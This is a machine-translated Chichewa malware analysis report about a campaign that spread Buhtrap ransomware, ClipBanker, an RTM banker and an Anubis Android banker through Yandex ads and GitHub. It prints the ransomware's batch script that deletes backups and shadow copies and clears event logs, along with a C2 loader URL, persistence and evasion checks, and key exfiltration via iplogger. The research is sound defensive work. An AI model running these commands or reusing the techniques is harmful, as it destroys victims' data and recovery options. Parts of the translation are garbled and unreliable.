Kuti muwongolere owerengera ndalama pakuwukira kwa cyber, mutha kugwiritsa ntchito zikalata zomwe amafufuza pa intaneti. Izi ndi zomwe gulu la cyber lakhala likuchita m'miyezi ingapo yapitayo, kugawa zinyumba zodziwika bwino. ΠΈ , komanso ma encryptor ndi mapulogalamu akuba ndalama za crypto. Zolinga zambiri zili ku Russia. Kuukiraku kunachitika ndikuyika malonda oyipa pa Yandex.Direct. Omwe adazunzidwa adawatumiza patsamba lomwe adafunsidwa kuti atsitse fayilo yoyipa yobisika ngati template ya zikalata. Yandex idachotsa kutsatsa koyipa pambuyo pa chenjezo lathu.
Khodi yochokera ku Buhtrap idatsitsidwa pa intaneti m'mbuyomu kotero kuti aliyense atha kuyigwiritsa ntchito. Tilibe chidziwitso chokhudza kupezeka kwa ma code a RTM.
Mu positi iyi tikuuzani momwe owukirawo adagawira pulogalamu yaumbanda pogwiritsa ntchito Yandex.Direct ndikuyiyika pa GitHub. Cholembacho chidzamaliza ndi kusanthula kwaukadaulo kwa pulogalamu yaumbanda.
Bhutrap ndi RTM abwerera kubizinesi
Njira yofalitsira ndi ozunzidwa
Malipiro osiyanasiyana omwe amaperekedwa kwa ozunzidwa amagawana njira imodzi yofalitsira. Mafayilo onse oyipa omwe adapangidwa ndi omwe adawukirawo adayikidwa m'malo awiri osiyana a GitHub.
Nthawi zambiri, malo osungiramo amakhala ndi fayilo imodzi yoyipa yotsitsa, yomwe imasinthidwa pafupipafupi. Popeza GitHub imakupatsani mwayi wowona mbiri yakusintha kosungirako, titha kuwona zomwe pulogalamu yaumbanda idagawidwa panthawi inayake. Kuti atsimikizire wozunzidwayo kuti atsitse fayilo yoyipa, webusaitiyi blanki-shabloni24[.]ru, yomwe ikuwonetsedwa pachithunzi pamwambapa, inagwiritsidwa ntchito.
Mapangidwe a malowa ndi mayina onse a mafayilo oyipa amatsatira lingaliro limodzi - mafomu, ma templates, makontrakiti, zitsanzo, ndi zina zotero. njira mu kampeni yatsopano ndi yofanana. Funso lokhalo ndilakuti wozunzidwayo adafika bwanji patsamba la omwe akuwukirawo.
Matenda
Osachepera angapo omwe adazunzidwa omwe adapezeka patsamba lino adakopeka ndi malonda oyipa. Pansipa pali chitsanzo cha URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ΡΠΊΠ°ΡΠ°ΡΡ Π±Π»Π°Π½ΠΊ ΡΡΠ΅ΡΠ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Monga mukuwonera pa ulalo, chikwangwani chinayikidwa pabwalo lovomerezeka lowerengera ndalama bb.f2[.]kz. Ndikofunikira kudziwa kuti zikwangwani zidawonekera patsamba losiyanasiyana, zonse zinali ndi id yofananira (blanki_rsya), komanso yokhudzana kwambiri ndi ma accounting kapena ntchito zothandizira zamalamulo. Ulalowu ukuwonetsa kuti yemwe angakhale wozunzidwayo adagwiritsa ntchito pempho la "kutsitsa ma invoice," lomwe limathandizira malingaliro athu akuwukira. Pansipa pali masamba omwe zikwangwani zidawonekera komanso mafunso ofananira nawo.
- tsitsani invoice fomu - bb.f2[.]kz
- chitsanzo cha mgwirizano - IPopen[.]ru
- chitsanzo chodandaula cha ntchito - 77metrov[.]ru
- mawonekedwe a mgwirizano - opanda-dogovor-kupli-prodazhi[.]ru
- Chitsanzo cha pempho la khothi - zen.yandex[.]ru
- chitsanzo chodandaula - yurday[.]ru
- zitsanzo mafomu a mgwirizano - Regforum[.]ru
- fomu ya mgwirizano - assistentus[.]ru
- chitsanzo cha mgwirizano wa nyumba - ββnapravah[.]com
- zitsanzo za mgwirizano walamulo - avito[.]ru
Tsamba la blanki-shabloni24[.]ru likhoza kukonzedwa kuti lipereke chithunzithunzi chosavuta. Nthawi zambiri, zotsatsa zomwe zimaloza patsamba lowoneka bwino lomwe lili ndi ulalo wa GitHub sizikuwoneka ngati zoyipa. Kuphatikiza apo, owukirawo adayika mafayilo oyipa kumalo osungirako kwakanthawi kochepa, mwina panthawi ya kampeni. Nthawi zambiri, malo osungira a GitHub anali ndi zip zakale zopanda kanthu kapena fayilo yopanda kanthu ya EXE. Chifukwa chake, owukira amatha kugawa zotsatsa kudzera pa Yandex.Direct pamasamba omwe mwina adachezeredwa ndi akauntanti omwe adabwera poyankha mafunso ena osaka.
Kenako, tiyeni tiwone zolipirira zosiyanasiyana zomwe zimagawidwa motere.
Malipiro Analysis
Nthawi yogawa
Ntchito yoyipayi idayamba kumapeto kwa Okutobala 2018 ndipo ikugwira ntchito panthawi yolemba. Popeza malo onse anali kupezeka pagulu pa GitHub, tidapanga nthawi yolondola yogawa mabanja asanu ndi limodzi a pulogalamu yaumbanda (onani chithunzi pansipa). Tawonjeza mzere wowonetsa pomwe ulalo wa banner udapezedwa, monga momwe amayesedwera ndi ESET telemetry, poyerekeza ndi mbiri ya git. Monga mukuonera, izi zimagwirizana bwino ndi kupezeka kwa malipiro pa GitHub. Kusiyanaku kumapeto kwa February kungafotokozedwe chifukwa tinalibe gawo la mbiri yosintha chifukwa chosungiracho chinachotsedwa ku GitHub tisanachipeze mokwanira.
Chithunzi 1. Mbiri ya kugawa kwa pulogalamu yaumbanda.
Ziphaso Zosaina Ma Code
Kampeniyo idagwiritsa ntchito ziphaso zingapo. Ena adasainidwa ndi mabanja angapo a pulogalamu yaumbanda, zomwe zikuwonetsanso kuti zitsanzo zosiyanasiyana zidali za kampeni imodzi. Ngakhale kupezeka kwa kiyi yachinsinsi, ogwiritsa ntchito sanasaine mwadongosolo ma binaries ndipo sanagwiritse ntchito makiyi a zitsanzo zonse. Chakumapeto kwa February 2019, achiwembu adayamba kupanga siginecha yolakwika pogwiritsa ntchito satifiketi ya Google yomwe analibe kiyi yachinsinsi.
Ziphaso zonse zomwe zikukhudzidwa ndi kampeni komanso mabanja omwe ali ndi pulogalamu yaumbanda zomwe amasaina zalembedwa patebulo pansipa.
Tagwiritsanso ntchito ziphaso izi kuti tipeze maulalo ndi mabanja ena omwe ali ndi pulogalamu yaumbanda. Pamasatifiketi ambiri, sitinapeze zitsanzo zomwe sizinagawidwe kudzera munkhokwe ya GitHub. Komabe, satifiketi ya TOV "MARIYA" idagwiritsidwa ntchito kusaina pulogalamu yaumbanda ya botnet , adware ndi ochita migodi. Sizokayikitsa kuti pulogalamu yaumbandayi ikugwirizana ndi kampeniyi. Mwinamwake, satifiketiyo idagulidwa pa darknet.
Win32/Filecoder.Buhtrap
Chigawo choyamba chomwe chidatikopa chidwi chinali Win32/Filecoder.Buhtrap. Ili ndi fayilo ya binary ya Delphi yomwe nthawi zina imayikidwa. Idagawidwa makamaka mu February-March 2019. Imachita monga momwe ikuyenera pulogalamu ya ransomware - imasaka ma drive am'deralo ndi zikwatu za netiweki ndikubisa mafayilo omwe apezeka. Sichifunikira kulumikizidwa kwa intaneti kuti chisokonezeke chifukwa sichilumikizana ndi seva kuti itumize makiyi obisa. M'malo mwake, imawonjezera "chizindikiro" kumapeto kwa uthenga wa dipo, ndikuwonetsa kugwiritsa ntchito imelo kapena Bitmessage kuti mulumikizane ndi ogwira ntchito.
Kuti mulembetse zinthu zambiri zodziwika bwino momwe mungathere, Filecoder.Buhtrap imayendetsa ulusi wopangidwira kutseka mapulogalamu ofunikira omwe angakhale ndi maofesi otseguka omwe ali ndi chidziwitso chamtengo wapatali chomwe chingasokoneze kubisala. Njira zomwe mukufuna kutsata ndi makina oyendetsera ma database (DBMS). Kuphatikiza apo, Filecoder.Buhtrap imachotsa mafayilo a chipika ndi zosunga zobwezeretsera kuti zikhale zovuta kuchira. Kuti muchite izi, yendetsani batch script pansipa.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap imagwiritsa ntchito ntchito yovomerezeka yapaintaneti ya IP Logger yopangidwa kuti itole zambiri za alendo omwe ali patsamba. Izi zimapangidwira kuti azitsatira omwe akhudzidwa ndi ransomware, womwe ndi udindo wa mzere wolamula:
mshta.exe "javascript:document.write('');"
Mafayilo a encryption amasankhidwa ngati sakufanana ndi mindandanda itatu yopatula. Choyamba, mafayilo omwe ali ndi zowonjezera zotsatirazi samasungidwa: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ndi .bat. Kachiwiri, mafayilo onse omwe njira yonse ili ndi zingwe zowongolera pamndandanda womwe uli pansipa sakuphatikizidwa.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Chachitatu, mayina ena amafayilo amachotsedwanso ku encryption, pakati pawo dzina lafayilo la uthenga wa dipo. Mndandanda waperekedwa pansipa. Mwachiwonekere, zonsezi zimapangidwira kuti makinawo azigwira ntchito, koma ndi mayendedwe ochepa.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Fayilo encryption scheme
Akaphedwa, pulogalamu yaumbanda imapanga makiyi a 512-bit RSA. The exponent wachinsinsi (d) ndi modulus (n) ndiye amasungidwa ndi kiyi yolimba ya 2048-bit public (public exponent and modulus), zlib-packed, and base64 encoded. Khodi yomwe idayambitsa izi ikuwonetsedwa pazithunzi 2.
Chithunzi 2. Zotsatira za kuwonongeka kwa Hex-Rays kwa 512-bit RSA key pair generation process.
Pansipa pali chitsanzo cha mawu osavuta okhala ndi kiyi yachinsinsi yopangidwa, yomwe ndi chizindikiro cholumikizidwa ndi uthenga wa dipo.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Kiyi ya anthu owukira yaperekedwa pansipa.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Mafayilo amasungidwa pogwiritsa ntchito AES-128-CBC yokhala ndi kiyi ya 256-bit. Pa fayilo iliyonse yobisidwa, kiyi yatsopano ndi vekitala yatsopano yoyambira imapangidwa. Chidziwitso chofunikira chimawonjezedwa kumapeto kwa fayilo yosungidwa. Tiyeni tiwone mtundu wa fayilo yosungidwa.
Mafayilo obisidwa ali ndi mutu wotsatirawu:
Deta ya fayilo yochokera ndi kuwonjezera kwa mtengo wamatsenga wa VEGA imasungidwa ku ma byte 0x5000 oyamba. Zidziwitso zonse za decryption zimalumikizidwa ndi fayilo yokhala ndi dongosolo ili:
- Cholembera kukula kwa fayilo chimakhala ndi chizindikiro chosonyeza ngati fayiloyo ndi yayikulu kuposa 0x5000 byte kukula kwake
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, key key of the RSA key pair))
- RSA key blob = ZlibCompress(RSAEncrypt(kiyi yachinsinsi ya RSA, kiyi yapagulu ya RSA)
Win32/ClipBanker
Win32/ClipBanker ndi gawo lomwe lidagawidwa pang'onopang'ono kuyambira kumapeto kwa Okutobala mpaka koyambirira kwa Disembala 2018. Udindo wake ndikuwunika zomwe zili pa clipboard, imayang'ana ma adilesi a cryptocurrency wallet. Atazindikira adilesi ya chikwama chandalama, ClipBanker ilowa m'malo mwake ndi adilesi yomwe amakhulupirira kuti ndi ya ogwiritsa ntchito. Zitsanzo zomwe tidazifufuza sizinali za bokosi kapena zosokoneza. Njira yokhayo yomwe imagwiritsidwa ntchito kubisa machitidwe ndikulemba zingwe. Maadiresi a chikwama cha operekera amasungidwa pogwiritsa ntchito RC4. Ma cryptocurrencies omwe amatsata ndi Bitcoin, ndalama za Bitcoin, Dogecoin, Ethereum ndi Ripple.
Panthawi yomwe pulogalamu yaumbanda ikufalikira kwa owukira 'Bitcoin wallets, ndalama zochepa zidatumizidwa ku VTS, zomwe zimakayikira kupambana kwa kampeni. Kuphatikiza apo, palibe umboni wosonyeza kuti izi zinali zokhudzana ndi ClipBanker konse.
Win32/RTM
Chigawo cha Win32/RTM chinagawidwa kwa masiku angapo koyambirira kwa Marichi 2019. RTM ndi Trojan banker yolembedwa ku Delphi, yoyang'ana pamabanki akutali. Mu 2017, ofufuza a ESET adasindikiza za pulogalamuyi, kufotokoza akadali zofunika. Mu Januware 2019, Palo Alto Networks idatulutsidwanso .
Bhutrap Loader
Kwa kanthawi, wotsitsa anali kupezeka pa GitHub zomwe sizinali zofanana ndi zida zam'mbuyomu za Buhtrap. Iye akutembenukira kwa https://94.100.18[.]67/RSS.php?<some_id> kuti mutenge siteji yotsatira ndikuyiyika molunjika pamtima. Tikhoza kusiyanitsa makhalidwe awiri a code siteji yachiwiri. Mu URL yoyamba, RSS.php inadutsa pakhomo la kumbuyo la Buhtrap mwachindunji - backdoor iyi ndi yofanana kwambiri ndi yomwe ilipo pambuyo poti gwero la code litsikidwe.
Chosangalatsa ndichakuti, tikuwona makampeni angapo okhala ndi kumbuyo kwa Buhtrap, ndipo akuti amayendetsedwa ndi ogwiritsa ntchito osiyanasiyana. Pachifukwa ichi, kusiyana kwakukulu ndikuti khomo lakumbuyo limakwezedwa molunjika ndikukumbukira ndipo siligwiritsa ntchito dongosolo lanthawi zonse ndi njira yotumizira DLL yomwe tidakambirana. . Kuphatikiza apo, ogwiritsa ntchito adasintha fungulo la RC4 lomwe limagwiritsidwa ntchito kubisa kuchuluka kwa maukonde ku seva ya C&C. M'makampeni ambiri omwe tawonapo, ogwiritsa ntchito sanavutike kusintha makiyi awa.
Chachiwiri, khalidwe lovuta kwambiri linali lakuti URL ya RSS.php inaperekedwa kwa katundu wina. Idakhazikitsa zosokoneza, monga kukonzanso tebulo losintha zinthu. Cholinga cha bootloader ndikulumikizana ndi seva ya C&C [.]com/api/F27F84EDA4D13B15/2, tumizani zipikazo ndikudikirira yankho. Imayendetsa yankho ngati blob, imayiyika mu kukumbukira ndikuichita. Kulipira komwe tidawona kukuchita chotsitsa ichi kunali kuseri kwa Buhtrap, koma pakhoza kukhala zigawo zina.
Android/Spy.Banker
Chosangalatsa ndichakuti, gawo la Android lidapezekanso munkhokwe ya GitHub. Anakhala munthambi yayikulu kwa tsiku limodzi lokha - Novembara 1, 2018. Kupatula kutumizidwa pa GitHub, ESET telemetry sipeza umboni wa pulogalamu yaumbandayi ikugawidwa.
Chigawochi chidasungidwa ngati Phukusi la Ntchito ya Android (APK). Ndizovuta kwambiri. Zoyipazi zimabisika mu JAR yosungidwa mu APK. Imasungidwa ndi RC4 pogwiritsa ntchito kiyi iyi:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Makiyi omwewo ndi algorithm amagwiritsidwa ntchito kubisa zingwe. JAR ili mkati APK_ROOT + image/files. Ma byte 4 oyambirira a fayilo ali ndi kutalika kwa JAR yotsekedwa, yomwe imayamba mwamsanga pambuyo pa gawo lautali.
Titachotsa fayiloyo, tidapeza kuti anali Anubis - m'mbuyomu banki kwa Android. Pulogalamu yaumbanda ili ndi izi:
- kujambula maikolofoni
- kutenga skrini
- kupeza ma coordinates a GPS
- keylogger
- kubisa kwa data ya chipangizo ndi kufunikira kwa dipo
- kutumiza spam
Chosangalatsa ndichakuti, wobankiyo adagwiritsa ntchito Twitter ngati njira yolumikizirana kuti apeze seva ina ya C&C. Chitsanzo chomwe tidasanthula chinagwiritsa ntchito akaunti ya @JonesTrader, koma panthawi yowunikira inali itatsekedwa kale.
Wobankiyo ali ndi mndandanda wazomwe akufuna pazida za Android. Ndi yayitali kuposa mndandanda womwe wapezeka mu kafukufuku wa Sophos. Mndandandawu umaphatikizapo ntchito zambiri zamabanki, mapulogalamu ogula pa intaneti monga Amazon ndi eBay, ndi ntchito za cryptocurrency.
MSIL/ClipBanker.IH
Gawo lomaliza lomwe lidagawidwa ngati gawo la kampeni iyi linali .NET Windows executable, yomwe idawonekera mu Marichi 2019. Mabaibulo ambiri omwe anaphunziridwa anali mmatumba ndi ConfuserEx v1.0.0. Monga ClipBanker, gawoli limagwiritsa ntchito bolodi lojambula. Cholinga chake ndi mitundu yambiri ya cryptocurrencies, komanso zopereka pa Steam. Kuphatikiza apo, amagwiritsa ntchito ntchito ya IP Logger kuba kiyi ya Bitcoin Private WIF.
Njira Zotetezera
Kuphatikiza pa zabwino zomwe ConfuserEx imapereka popewa kusokoneza, kutaya, ndi kusokoneza, chigawochi chimaphatikizapo kuzindikira zinthu za antivayirasi ndi makina enieni.
Kuti muwonetsetse kuti ikuyenda pamakina enieni, pulogalamu yaumbanda imagwiritsa ntchito mzere wolamula wa Windows WMI (WMIC) kufunsa zambiri za BIOS, zomwe ndi:
wmic bios
Kenako pulogalamuyo imagawa zomwe zatulutsidwa ndikuyang'ana mawu osakira: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Kuti muzindikire zinthu za antivayirasi, pulogalamu yaumbanda imatumiza pempho la Windows Management Instrumentation (WMI) ku Windows Security Center pogwiritsa ntchito ManagementObjectSearcher API monga momwe zilili pansipa. Pambuyo polemba kuchokera ku base64 kuyimba kumawoneka motere:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Chithunzi 3. Njira yozindikiritsira zinthu za antivayirasi.
Kuphatikiza apo, pulogalamu yaumbanda imayang'ana ngati , chida chotchinjiriza motsutsana ndi kuwukira kwa clipboard ndipo, ngati ikuyenda, imayimitsa ulusi wonse munjirayo, potero imalepheretsa chitetezo.
Kulimbikira
Mtundu wa pulogalamu yaumbanda yomwe tidaphunzira imadzipangira yokha %APPDATA%googleupdater.exe ndikuyika mawonekedwe "obisika" a google directory. Kenako amasintha mtengo SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell mu kaundula wa Windows ndikuwonjezera njira updater.exe. Mwanjira iyi, pulogalamu yaumbanda idzachitidwa nthawi iliyonse wogwiritsa ntchito akalowa.
Khalidwe loipa
Monga ClipBanker, pulogalamu yaumbanda imayang'anira zomwe zili mu clipboard ndikuyang'ana maadiresi a chikwama cha cryptocurrency, ndipo ikapezeka, m'malo mwake ndi imodzi mwama adilesi a wogwiritsa ntchito. M'munsimu muli mndandanda wa maadiresi omwe mukufuna kutsata malinga ndi zomwe zimapezeka mu code.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Pamtundu uliwonse wa adilesi pali mawu ofananira nawo. Mtengo wa STEAM_URL umagwiritsidwa ntchito kuukira makina a Steam, monga momwe zimawonekere pamawu okhazikika omwe amagwiritsidwa ntchito kutanthauzira mu buffer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Njira yotsatsira
Kuphatikiza pakusintha ma adilesi mu buffer, pulogalamu yaumbanda imayang'ana makiyi achinsinsi a WIF a Bitcoin, Bitcoin Core ndi Electrum Bitcoin wallet. Pulogalamuyi imagwiritsa ntchito plogger.org ngati njira yotulutsira kuti mupeze kiyi yachinsinsi ya WIF. Kuti muchite izi, ogwiritsa ntchito amawonjezera makiyi achinsinsi pamutu wa User-Agent HTTP, monga momwe zilili pansipa.
Chithunzi 4. IP Logger console ndi deta yotulutsa.
Othandizira sanagwiritse ntchito iplogger.org kutulutsa zikwama. Mwinamwake adagwiritsa ntchito njira ina chifukwa cha malire a 255 m'munda User-Agentkuwonetsedwa pa intaneti ya IP Logger. M'zitsanzo zomwe tidaphunzira, seva ina yotulutsa idasungidwa muzosintha zachilengedwe DiscordWebHook. Chodabwitsa n'chakuti kusintha kwa chilengedwechi sikuperekedwa kulikonse mu code. Izi zikuwonetsa kuti pulogalamu yaumbanda ikadali yopangidwa ndipo zosinthazo zimaperekedwa ku makina oyesera a wogwiritsa ntchito.
Palinso chizindikiro china chosonyeza kuti pulogalamuyo ikukula. Fayilo ya binary imaphatikizapo ma URL awiri a iplogger.org, ndipo onse amafunsidwa pamene deta yatulutsidwa. Mu pempho ku amodzi mwa ma URL awa, mtengo womwe uli mu gawo la Referer umatsogozedwa ndi "DEV /". Tapezanso mtundu womwe sunapakidwe pogwiritsa ntchito ConfuserEx, wolandila ulalowu amatchedwa DevFeedbackUrl. Kutengera dzina lakusintha kwachilengedwe, tikukhulupirira kuti ogwiritsa ntchito akukonzekera kugwiritsa ntchito ntchito yovomerezeka ya Discord ndi njira yake yolumikizira intaneti kuti abe ma wallet a cryptocurrency.
Pomaliza
Kampeni iyi ndi chitsanzo cha kugwiritsa ntchito zotsatsa zovomerezeka pakuwukira kwa intaneti. Chiwembuchi chimayang'ana mabungwe aku Russia, koma sitingadabwe kuwona kuukira kotereku pogwiritsa ntchito mautumiki omwe si a Russia. Pofuna kupewa kunyengerera, ogwiritsa ntchito ayenera kudalira mbiri ya gwero la mapulogalamu omwe amatsitsa.
Mndandanda wathunthu wazowonetsa kunyengerera ndi mawonekedwe a MITER ATT&CK akupezeka pa .
Source: www.habr.com